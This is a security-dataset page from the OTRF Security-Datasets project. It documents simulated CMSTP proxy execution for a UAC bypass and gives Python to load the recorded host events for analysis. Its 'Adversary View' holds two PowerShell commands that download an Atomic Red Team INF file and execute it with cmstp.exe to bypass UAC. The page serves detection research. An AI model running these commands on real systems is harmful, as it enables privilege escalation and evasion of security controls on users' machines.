Contents

CMSTP Proxy Execution

Contents

CMSTP Proxy Execution#

Metadata#


Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/10/22
Modification Date	2020/10/22
Tactics	TA0005
Techniques	T1218.003
Tags	art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0

Dataset Description#

This dataset represents threat actors leveraging CMSTP to execute an Inf file to proxy execute other malicious commands (i.e. cmd.exe). (Embedding commands in the RunPreSetupCommandsSection of the INF file).

Datasets Downloads#

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip

Simulation Metadata#

Tools#

type	Name	Module
Manual	powershell	powershell

Adversary View#

Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile C:\ProgramData\T1218.003_uacbypass.inf
cmstp.exe /s C:\ProgramData\T1218.003_uacbypass.inf /au

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)

References#

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md#atomic-test-2—cmstp-executing-uac-bypass